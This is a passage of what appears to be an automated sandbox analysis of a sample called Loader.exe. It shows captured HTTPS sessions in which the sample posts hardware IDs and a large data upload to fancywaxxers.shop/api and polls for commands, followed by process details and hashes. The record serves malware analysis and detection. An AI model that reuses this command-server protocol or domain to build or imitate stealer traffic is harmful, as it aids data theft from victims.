NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8faee56a1f09c323-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1518&min_rtt=1469&rtt_var=649&sent=17&recv=28&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21370&delivery_rate=1568206&cwnd=214&unsent_bytes=0&cid=1dd28fa8d8e356b3&ts=521&x=0"
2025-01-01 01:57:01 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2025-01-01 01:57:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
5192.168.2.449735104.21.48.14432588C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 01:57:02 UTC | 273 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=3HXJG0UTZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1218
Host: fancywaxxers.shop
2025-01-01 01:57:02 UTC | 1218 | OUT | Data Raw: (hex dump omitted)
Data Ascii:
--3HXJG0UTZ
Content-Disposition: form-data; name="hwid"

2106D7020EE20555E1B71982A10B646A
--3HXJG0UTZ
Content-Disposition: form-data; name="pid"

1
--3HXJG0UTZ
Content-Disposition: form-data; name="lid"

yau6Na--6524795094
--3HXJG0UTZ
Content
2025-01-01 01:57:03 UTC | 1136 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 01:57:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=nl86ctaj5sg1snlvjofa8uused; expires=Sat, 26 Apr 2025 19:43:41 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uofs%2FCe8EoNsfolATh%2BWs%2FT9wSlPrv3lWVi%2FHezkUiBqABRzJVP90IrjAZOI4VpNBbCZQgv7Qc7V69N1GkXEqrjh8BF%2BEM8fYT1Zr1KffU2wutwyjrwSjFp%2BxJl1hLwAbUOYmg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8faee5731e93c461-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1644&rtt_var=639&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2127&delivery_rate=1683967&cwnd=228&unsent_bytes=0&cid=d227498ab77623f3&ts=745&x=0"
2025-01-01 01:57:03 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2025-01-01 01:57:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
6192.168.2.449736104.21.48.14432588C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 01:57:04 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=GDPI4RY1FL2OPH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 586169
Host: fancywaxxers.shop
2025-01-01 01:57:04 UTC | 15331 | OUT | Data Raw: (hex dump omitted)
Data Ascii:
--GDPI4RY1FL2OPH
Content-Disposition: form-data; name="hwid"

2106D7020EE20555E1B71982A10B646A
--GDPI4RY1FL2OPH
Content-Disposition: form-data; name="pid"

1
--GDPI4RY1FL2OPH
Content-Disposition: form-data; name="lid"

yau6Na--6524795094
--GDP
2025-01-01 01:57:04 UTC | 15331 | OUT | Data Raw: (hex dump omitted)
Data Ascii: (non-printable binary payload omitted)
2025-01-01 01:57:04 UTC | 15331 | OUT | Data Raw: (hex dump omitted)
Data Ascii: (non-printable binary payload omitted)
2025-01-01 01:57:04 UTC | 15331 | OUT | Data Raw: (hex dump omitted)
Data Ascii: (non-printable binary payload omitted)
2025-01-01 01:57:04 UTC | 15331 | OUT | Data Raw: (hex dump omitted)
Data Ascii: (non-printable binary payload omitted)
2025-01-01 01:57:04 UTC | 15331 | OUT | Data Raw: (hex dump omitted)
Data Ascii: (non-printable binary payload omitted)
2025-01-01 01:57:04 UTC | 15331 | OUT | Data Raw: (hex dump omitted)
Data Ascii: (non-printable binary payload omitted)
2025-01-01 01:57:04 UTC | 15331 | OUT | Data Raw: (hex dump omitted)
                                                                                                Data Ascii: ikH`y kU*sfUNq`O&pK:W$_nmFXy>x~Z(IkT, #I#'PDs.@0S9Q{IpWxfV.FB'uA0@k-8sa(EjM]*I)
                                                                                                2025-01-01 01:57:04 UTC15331OUTData Raw: c5 b5 c7 76 38 80 2b 4a b6 31 27 b2 75 fb 96 8e a8 4c 4e 08 8b d1 cf ec c5 b6 1e 12 4f 49 22 0d 7c 67 b5 1d 39 96 9d bb 84 3e e4 4e 21 48 40 25 d7 89 b5 e6 25 88 62 c2 0e ff f9 e9 c1 99 e2 ce 68 53 92 59 f9 a6 fc cc 65 b6 ef 8f 04 46 b7 a4 d2 67 d3 0e c8 d3 91 76 68 37 6e 3e b9 80 84 1d f7 5e 7a 0e d6 01 17 cb ff 5d fc 19 66 24 c6 4f f8 c1 63 f0 4c 5d b4 ec 87 97 fc 60 4e ba 38 f8 3c 13 6e ed d4 b8 9e ef 7c 7b 53 14 7e 43 e1 7f 93 36 f2 94 c4 c6 63 ed 34 66 72 3b d9 08 40 1c c0 03 48 68 13 0b fd 06 4a 22 84 a4 d7 95 28 ea cf c1 cd 57 e8 1e 8d 26 64 b6 1a ae 7e ff a4 c8 9f 7f 61 6a 54 5a 64 c4 36 a2 92 6d b9 3d 54 d1 88 e4 5a 8b ca fd 8a 06 1c 77 61 3d 02 21 d6 6b ba 6c 3a 16 81 b2 a0 08 9e 86 63 8f aa 7c 29 f3 78 4a 11 fd 30 f0 72 28 f3 f6 94 7b 55 63 61
                                                                                                Data Ascii: v8+J1'uLNOI"|g9>N!H@%%bhSYeFgvh7n>^z]f$OcL]`N8<n|{S~C6c4fr;@HhJ"(W&d~ajTZd6m=TZwa=!kl:c|)xJ0r({Uca
                                                                                                2025-01-01 01:57:04 UTC15331OUTData Raw: 9f b4 13 0c e0 39 0e 04 8a 28 50 35 7b 42 43 05 54 b3 d6 58 4a 40 cb 09 c6 33 d0 6b cb 17 7a 45 00 e7 2e 06 9e b3 55 00 e1 9b 2b 5d 4b a2 8a 07 47 0b 2b 17 8f 73 e7 cb 03 d7 63 ad cf 05 c5 c0 7c 5f ca 98 4e 9d e2 63 1a 3e 58 02 a5 89 96 ff eb 20 b7 09 82 66 42 d1 eb 31 ba 73 13 4c 9a 93 ad d7 aa b9 b3 d7 b2 ad 86 81 9e bb 15 34 14 bc 44 fb 48 01 b5 ca 69 18 19 1d 73 23 e4 90 8a b7 56 c0 e0 48 38 cb 0b ce d5 53 88 6d 15 4f 22 1d db 5e 3b 29 a6 54 c8 ef 91 1c 75 8f 50 1b 5f 74 2c 49 41 e0 a5 19 f0 8e dd 7a 40 c5 9c 02 df 3c 9a fd e7 c9 06 89 5c af 11 74 a4 f6 be eb d5 36 40 ef 97 d0 99 f9 f3 fe 94 c2 73 43 1c 35 8e 3d 48 43 84 f3 91 79 74 4c b4 2c f7 fe 3d 10 1a b0 f2 92 ad 1b 65 52 d6 f5 69 3d 27 aa 57 fc 34 0b 9f 14 20 20 db 56 f8 1b 9b 1e e8 2d 85 18 f6
                                                                                                Data Ascii: 9(P5{BCTXJ@3kzE.U+]KG+sc|_Nc>X fB1sL4DHis#VH8SmO"^;)TuP_t,IAz@<\t6@sC5=HCytL,=eRi='W4 V-
                                                                                                2025-01-01 01:57:05 UTC | 1143 | IN | HTTP/1.1 200 OK
                                                                                                Date: Wed, 01 Jan 2025 01:57:05 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=kg91krtdq4i75tsqlq4i2q5udk; expires=Sat, 26 Apr 2025 19:43:44 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hdUqCSXWR1tXIR11qOHD%2BrhUzduukyOjUFsxgyRe%2BcM%2BvnCMWCBFE3Vat7Vcg1zhMkgJ%2FfUdpV%2FPI1aVaGCu2CIcis7NiD5xQHLqGzqs%2FDmvb0v4TKAWPZOou2U4g6Npf1MRSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8faee57dccb2c323-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1470&rtt_var=569&sent=344&recv=603&lost=0&retrans=0&sent_bytes=2843&recv_bytes=588757&delivery_rate=1893644&cwnd=214&unsent_bytes=0&cid=8df705c945937c45&ts=1679&x=0"


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                7 | 192.168.2.4 | 49737 | 104.21.48.14 | 443 | 2588 | C:\Users\user\Desktop\Loader.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2025-01-01 01:57:06 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 87
                                                                                                Host: fancywaxxers.shop
                                                                                                2025-01-01 01:57:06 UTC | 87 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 35 32 34 37 39 35 30 39 34 26 6a 3d 26 68 77 69 64 3d 32 31 30 36 44 37 30 32 30 45 45 32 30 35 35 35 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41
                                                                                                Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6524795094&j=&hwid=2106D7020EE20555E1B71982A10B646A
                                                                                                2025-01-01 01:57:06 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                                Date: Wed, 01 Jan 2025 01:57:06 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=ot6c8h81unn8au32di9q84079u; expires=Sat, 26 Apr 2025 19:43:45 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Niy5JcgU%2B6fY1f%2FbyVUxRZtHzH0cupZjtCt9s139tUpjgDnMPtSl6DNHs0CyxZ3%2BhmV1D0P2vki9UNnm8iqRo0nd8UIRcqm4RXfBM0wjlv6js%2Fw5f0C6FWCTrEKklJuntr2udA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8faee58b8df143be-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2102&min_rtt=1647&rtt_var=943&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=988&delivery_rate=1772920&cwnd=226&unsent_bytes=0&cid=488b68dcc0d06c9b&ts=488&x=0"
                                                                                                2025-01-01 01:57:06 UTC238INData Raw: 33 36 37 30 0d 0a 57 65 35 73 4a 76 33 6c 6d 70 74 51 68 4e 31 43 44 57 41 4c 51 61 4e 48 66 58 38 4a 35 5a 30 70 71 4b 69 4c 4b 36 62 70 65 70 67 43 6c 55 35 41 69 63 65 67 71 6e 79 6d 75 47 41 33 55 53 64 6a 78 32 56 48 58 57 4f 57 2b 6d 33 67 34 2b 64 48 34 39 6f 38 7a 6d 69 4d 42 32 36 2b 6b 63 44 74 45 38 32 75 41 55 73 59 59 77 44 73 4e 79 63 4a 50 6f 2f 53 47 74 43 66 7a 45 72 78 73 54 4c 63 4d 6f 41 66 52 59 79 69 7a 38 38 7a 30 70 55 55 65 44 46 6f 43 70 49 71 52 54 5a 67 6b 74 52 78 37 2b 33 4b 48 63 71 45 55 65 30 55 32 51 70 75 6a 72 2f 71 77 54 50 64 36 67 74 4d 47 48 49 78 2b 52 55 7a 42 31 2b 42 79 68 7a 71 33 2f 6c 38 78 4a 34 54 31 42 69 47 44 33 2b 73 6f 65 76 4d 4d 71 2f 70 4f 48 6c 59
                                                                                                Data Ascii: 3670We5sJv3lmptQhN1CDWALQaNHfX8J5Z0pqKiLK6bpepgClU5AicegqnymuGA3USdjx2VHXWOW+m3g4+dH49o8zmiMB26+kcDtE82uAUsYYwDsNycJPo/SGtCfzErxsTLcMoAfRYyiz88z0pUUeDFoCpIqRTZgktRx7+3KHcqEUe0U2Qpujr/qwTPd6gtMGHIx+RUzB1+Byhzq3/l8xJ4T1BiGD3+soevMMq/pOHlY
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 62 51 76 4f 4b 78 45 48 62 71 76 34 48 4f 33 5a 35 58 6e 68 6d 77 4b 6f 4f 34 77 45 61 6f 57 35 74 66 68 6e 33 5a 49 49 64 53 34 35 4a 74 6f 52 47 7a 70 74 6a 36 77 66 38 4e 6a 46 62 35 61 6e 41 71 39 76 32 43 74 67 79 49 7a 49 2f 7a 33 4d 37 68 55 31 55 58 49 6c 37 43 6f 70 43 47 62 51 38 42 6a 53 7a 74 77 66 77 34 55 58 73 33 4b 4b 48 6b 43 31 75 62 58 42 4a 4f 43 2b 49 48 77 48 61 6e 4c 57 4e 79 63 74 52 35 33 4c 54 66 2b 64 79 51 44 55 76 68 6a 4c 4e 4b 38 74 58 70 61 38 79 39 67 68 30 37 39 70 4f 56 56 2f 65 63 59 2f 45 42 4e 6c 6e 66 64 64 7a 2b 7a 44 59 4d 72 59 50 36 73 66 75 46 31 45 6c 71 33 5a 37 77 72 79 6d 67 74 2b 4d 30 30 35 79 77 59 79 4e 56 4f 54 71 32 33 6e 6d 2f 4d 63 34 59 67 74 77 42 36 6e 46 57 65 77 68 75 76 4d 42 64 43 2b 46 46 6f
                                                                                                Data Ascii: bQvOKxEHbqv4HO3Z5XnhmwKoO4wEaoW5tfhn3ZIIdS45JtoRGzptj6wf8NjFb5anAq9v2CtgyIzI/z3M7hU1UXIl7CopCGbQ8BjSztwfw4UXs3KKHkC1ubXBJOC+IHwHanLWNyctR53LTf+dyQDUvhjLNK8tXpa8y9gh079pOVV/ecY/EBNlnfddz+zDYMrYP6sfuF1Elq3Z7wrymgt+M005ywYyNVOTq23nm/Mc4YgtwB6nFWewhuvMBdC+FFo
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 57 78 4a 42 58 33 64 2b 46 48 46 78 4f 64 54 7a 4a 6f 64 33 42 47 6c 41 45 71 34 31 74 7a 4e 59 65 61 32 43 6b 34 55 55 54 66 67 44 67 34 38 54 35 33 31 61 4f 66 59 30 56 32 52 67 7a 57 72 49 64 6b 72 52 36 71 39 33 64 51 70 78 5a 41 68 66 44 64 65 46 63 41 52 4a 53 6c 38 74 50 35 69 6d 63 57 7a 59 73 2b 65 4d 38 41 65 71 79 30 51 6b 59 6a 47 74 43 58 4a 36 69 52 46 45 31 45 78 2b 53 51 6b 53 45 43 6b 35 56 44 59 38 74 6c 6c 33 72 38 65 7a 32 79 73 47 31 53 71 68 2b 33 79 48 4d 57 31 49 56 51 78 54 7a 44 30 4a 56 5a 4c 63 35 47 6c 54 4e 44 46 35 30 66 65 67 77 6e 2f 48 61 59 6e 53 70 47 67 71 64 30 47 74 62 38 70 52 53 4e 2f 47 39 55 45 4e 41 78 4b 6f 2b 56 42 36 65 66 37 63 64 44 65 45 4e 64 71 6c 6c 74 68 6e 4c 4c 43 33 42 2f 39 6e 41 39 75 45 56 77 55
                                                                                                Data Ascii: WxJBX3d+FHFxOdTzJod3BGlAEq41tzNYea2Ck4UUTfgDg48T531aOfY0V2RgzWrIdkrR6q93dQpxZAhfDdeFcARJSl8tP5imcWzYs+eM8Aeqy0QkYjGtCXJ6iRFE1Ex+SQkSECk5VDY8tll3r8ez2ysG1Sqh+3yHMW1IVQxTzD0JVZLc5GlTNDF50fegwn/HaYnSpGgqd0Gtb8pRSN/G9UENAxKo+VB6ef7cdDeENdqllthnLLC3B/9nA9uEVwU
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 78 46 31 61 52 71 38 64 7a 38 65 4e 36 41 47 65 6b 4e 6e 7a 74 45 7a 39 62 56 73 42 7a 4f 70 41 63 34 4b 31 4a 79 39 79 46 46 53 7a 79 73 7a 32 65 62 38 4f 35 4d 2f 4e 6b 71 2f 67 6d 47 43 31 44 46 76 61 4c 32 50 4f 6d 4d 4d 54 30 34 65 41 66 4a 4b 6b 6b 74 55 4c 2f 78 57 63 65 63 7a 30 4c 45 6b 43 7a 39 4c 49 77 65 52 38 79 56 77 76 41 41 37 75 77 4a 61 42 70 42 42 2b 6f 78 4f 42 49 2b 6a 76 70 45 7a 5a 75 36 55 65 4f 4f 54 75 34 77 33 7a 68 36 30 71 69 69 77 6a 6e 33 35 54 4e 6a 4d 6d 64 71 6b 6e 35 45 4f 43 4b 31 79 30 76 6b 32 75 68 6f 6c 72 4d 75 2f 77 36 45 4f 58 4f 57 6e 64 37 57 41 38 47 50 4e 55 38 45 53 43 6a 6e 45 7a 67 6c 54 4a 7a 6f 5a 5a 2f 78 76 56 72 45 67 68 79 73 59 4c 30 43 54 62 65 38 36 65 49 57 38 37 6f 76 56 54 42 4a 41 35 63 55 43
                                                                                                Data Ascii: xF1aRq8dz8eN6AGekNnztEz9bVsBzOpAc4K1Jy9yFFSzysz2eb8O5M/Nkq/gmGC1DFvaL2POmMMT04eAfJKkktUL/xWcecz0LEkCz9LIweR8yVwvAA7uwJaBpBB+oxOBI+jvpEzZu6UeOOTu4w3zh60qiiwjn35TNjMmdqkn5EOCK1y0vk2uholrMu/w6EOXOWnd7WA8GPNU8ESCjnEzglTJzoZZ/xvVrEghysYL0CTbe86eIW87ovVTBJA5cUC
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 2f 59 35 6a 70 76 47 62 45 33 69 72 4a 44 5a 6b 46 52 4b 65 75 39 71 30 42 79 4a 55 4a 58 6b 74 36 64 38 45 6b 46 41 6f 36 69 66 46 52 7a 2f 43 7a 61 63 4f 41 41 2f 51 52 76 6a 74 33 7a 4b 6e 78 30 7a 6e 57 6a 7a 5a 6c 42 55 52 34 7a 54 4d 68 55 45 33 63 2f 33 44 69 79 75 67 64 30 70 41 71 30 6a 44 63 48 6d 57 77 74 38 2f 4d 4f 73 32 58 41 56 77 57 51 78 62 5a 43 41 74 48 57 4e 66 4f 55 38 57 66 33 31 32 53 68 53 76 56 62 59 4d 2f 53 63 2b 31 79 74 49 49 78 34 63 36 4f 41 4e 52 64 75 73 56 43 53 78 6b 31 66 52 67 38 4a 6a 49 65 2b 75 61 54 71 41 58 74 79 56 63 6d 36 62 79 2b 41 6e 2b 68 53 78 38 56 58 6f 75 2b 7a 46 4f 54 6a 71 2f 2f 45 6a 6e 35 74 63 45 34 36 30 79 30 7a 65 50 57 68 4c 4c 6c 4e 48 38 4e 76 7a 6b 45 57 41 78 50 33 54 35 4c 42 34 6e 50 59
                                                                                                Data Ascii: /Y5jpvGbE3irJDZkFRKeu9q0ByJUJXkt6d8EkFAo6ifFRz/CzacOAA/QRvjt3zKnx0znWjzZlBUR4zTMhUE3c/3Diyugd0pAq0jDcHmWwt8/MOs2XAVwWQxbZCAtHWNfOU8Wf312ShSvVbYM/Sc+1ytIIx4c6OANRdusVCSxk1fRg8JjIe+uaTqAXtyVcm6by+An+hSx8VXou+zFOTjq//Ejn5tcE460y0zePWhLLlNH8NvzkEWAxP3T5LB4nPY
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 35 65 78 46 2f 4b 6f 7a 7a 47 43 42 57 78 4b 62 74 4f 72 77 48 4e 4c 73 48 69 49 46 59 53 2f 61 50 68 67 61 55 63 36 70 51 35 6a 4c 34 6c 36 56 68 52 62 67 62 36 73 59 65 74 4b 72 72 4f 38 38 36 72 55 36 56 51 39 4f 4f 4f 5a 2b 53 54 5a 72 72 50 39 62 36 38 76 54 48 38 75 78 4b 74 6f 62 32 6a 39 52 68 35 32 74 33 44 48 54 68 51 70 69 4d 7a 68 35 77 68 74 53 4b 46 36 41 30 48 2f 4e 7a 39 39 69 79 61 35 52 33 47 43 49 58 6c 4f 4d 67 64 4c 4f 45 62 4b 62 49 33 73 4a 55 54 54 77 46 53 6f 75 58 6f 33 33 52 2b 37 6b 38 31 50 6e 6d 67 72 4b 49 36 59 37 51 4c 69 68 32 50 77 69 30 37 38 31 61 7a 41 37 64 4a 63 4b 4a 7a 74 52 73 66 45 62 7a 75 54 54 57 65 43 35 49 50 6b 37 6c 7a 68 63 6e 4b 36 72 33 68 48 4f 36 68 73 37 45 56 4d 30 39 69 30 78 45 79 4b 63 37 6e 76
                                                                                                Data Ascii: 5exF/KozzGCBWxKbtOrwHNLsHiIFYS/aPhgaUc6pQ5jL4l6VhRbgb6sYetKrrO886rU6VQ9OOOZ+STZrrP9b68vTH8uxKtob2j9Rh52t3DHThQpiMzh5whtSKF6A0H/Nz99iya5R3GCIXlOMgdLOEbKbI3sJUTTwFSouXo33R+7k81PnmgrKI6Y7QLih2Pwi0781azA7dJcKJztRsfEbzuTTWeC5IPk7lzhcnK6r3hHO6hs7EVM09i0xEyKc7nv
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 4e 79 4b 46 63 52 32 6e 51 46 50 69 5a 66 4b 32 6d 50 53 75 78 56 2b 44 7a 49 44 31 44 55 71 48 58 36 50 36 55 37 4e 6e 50 6c 6c 35 61 6f 67 71 68 4b 76 46 47 69 38 6f 75 44 48 66 38 71 6b 64 69 59 5a 61 54 44 6c 44 42 55 54 54 4a 33 35 53 4e 48 43 75 32 50 6c 6e 53 44 75 47 71 38 32 61 36 6a 51 7a 2f 34 66 78 36 55 4e 4f 67 70 45 63 75 38 4c 46 43 6c 62 69 39 68 6e 36 39 2f 4e 66 4a 57 36 51 76 73 68 67 31 6c 2f 7a 4a 62 79 36 41 62 65 6c 41 41 6d 42 58 49 67 78 78 74 53 52 6d 71 6a 78 32 57 59 2b 63 42 68 34 37 30 4f 31 53 32 37 50 52 62 4f 73 64 33 33 4b 65 36 36 4c 56 55 33 65 43 36 61 42 51 6f 4e 58 6f 66 71 54 75 48 30 70 48 50 53 6d 69 6d 76 4e 62 78 55 62 35 53 53 79 64 56 6a 77 49 6f 47 55 55 39 6a 42 66 63 4f 4f 44 70 77 30 4e 4d 65 34 5a 37 36
                                                                                                Data Ascii: NyKFcR2nQFPiZfK2mPSuxV+DzID1DUqHX6P6U7NnPll5aogqhKvFGi8ouDHf8qkdiYZaTDlDBUTTJ35SNHCu2PlnSDuGq82a6jQz/4fx6UNOgpEcu8LFClbi9hn69/NfJW6Qvshg1l/zJby6AbelAAmBXIgxxtSRmqjx2WY+cBh470O1S27PRbOsd33Ke66LVU3eC6aBQoNXofqTuH0pHPSmimvNbxUb5SSydVjwIoGUU9jBfcOODpw0NMe4Z76
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 6e 68 41 4b 49 6c 52 4c 54 55 33 39 41 2b 38 5a 42 31 61 53 74 2f 47 2f 45 67 45 69 5a 50 71 75 68 72 30 64 6a 52 63 63 66 64 4c 66 51 63 33 43 35 42 6a 37 4b 75 38 67 50 43 69 58 64 31 41 31 45 43 2b 69 55 6f 56 46 50 64 30 32 32 65 6d 65 64 50 30 34 77 51 36 7a 36 71 49 6e 47 68 79 76 65 73 42 38 4b 38 46 44 78 51 51 77 4c 58 48 52 68 50 66 6f 2b 71 61 35 72 59 31 77 54 56 32 41 44 31 45 34 77 75 63 37 4f 66 38 74 67 69 39 62 41 65 49 69 46 63 46 35 55 39 43 6a 45 34 76 61 78 62 34 2f 6a 61 53 4f 33 59 46 36 41 51 68 69 35 73 71 61 50 34 33 6d 48 73 70 44 52 6c 46 32 45 51 35 42 59 63 4d 46 75 6e 32 6d 48 51 6d 4d 6c 6d 30 72 77 6f 30 69 47 34 4f 6c 36 53 33 66 6e 74 4d 64 32 55 4e 57 34 68 59 79 4c 36 50 68 73 75 58 34 7a 50 59 70 37 36 38 57 6e 57 72
                                                                                                Data Ascii: nhAKIlRLTU39A+8ZB1aSt/G/EgEiZPquhr0djRccfdLfQc3C5Bj7Ku8gPCiXd1A1EC+iUoVFPd022emedP04wQ6z6qInGhyvesB8K8FDxQQwLXHRhPfo+qa5rY1wTV2AD1E4wuc7Of8tgi9bAeIiFcF5U9CjE4vaxb4/jaSO3YF6AQhi5sqaP43mHspDRlF2EQ5BYcMFun2mHQmMlm0rwo0iG4Ol6S3fntMd2UNW4hYyL6PhsuX4zPYp768WnWr
                                                                                                2025-01-01 01:57:06 UTC1369INData Raw: 2f 43 47 6e 4d 69 4b 4c 53 5a 66 4f 58 4b 45 6f 6a 52 6e 66 54 64 56 59 5a 52 4e 33 2f 59 5a 6e 79 35 45 50 46 69 30 6e 52 46 34 59 56 51 36 65 39 38 75 4d 4b 38 49 55 41 54 31 4a 74 46 76 51 77 46 45 64 49 69 4e 52 77 34 64 4c 35 51 63 54 64 51 75 49 78 31 67 70 2b 6b 49 79 72 34 32 6e 33 74 58 56 46 4c 6a 49 74 36 67 38 34 47 44 69 38 38 6d 48 78 33 4e 4a 6d 35 61 59 2f 32 7a 71 73 43 31 36 79 6c 4b 2f 74 50 4f 36 4e 42 48 56 55 5a 69 44 74 44 7a 56 4e 63 4b 4b 6c 53 70 72 46 33 6e 2f 6e 72 53 4b 70 63 74 35 55 5a 5a 4f 4b 32 63 73 30 36 65 55 79 52 42 56 44 4d 39 6f 79 54 55 74 2f 69 39 68 54 6e 76 4c 66 59 63 32 63 48 4d 30 50 31 79 51 4e 74 4a 32 73 30 51 79 72 69 44 68 39 45 6c 77 6c 31 43 6b 66 56 46 79 4e 31 45 6a 51 36 65 39 36 79 39 77 5a 31 77
                                                                                                Data Ascii: /CGnMiKLSZfOXKEojRnfTdVYZRN3/YZny5EPFi0nRF4YVQ6e98uMK8IUAT1JtFvQwFEdIiNRw4dL5QcTdQuIx1gp+kIyr42n3tXVFLjIt6g84GDi88mHx3NJm5aY/2zqsC16ylK/tPO6NBHVUZiDtDzVNcKKlSprF3n/nrSKpct5UZZOK2cs06eUyRBVDM9oyTUt/i9hTnvLfYc2cHM0P1yQNtJ2s0QyriDh9Elwl1CkfVFyN1EjQ6e96y9wZ1w



                                                                                                Target ID:0
                                                                                                Start time:20:56:53
                                                                                                Start date:31/12/2024
                                                                                                Path:C:\Users\user\Desktop\Loader.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                Imagebase:0xd30000
                                                                                                File size:822'784 bytes
                                                                                                MD5 hash:0792FCE4557CAE0687A02E5E41BE587A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:20:56:53
                                                                                                Start date:31/12/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:20:56:54
                                                                                                Start date:31/12/2024
                                                                                                Path:C:\Users\user\Desktop\Loader.exe
                                                                                                Wow64 process (32bit):true
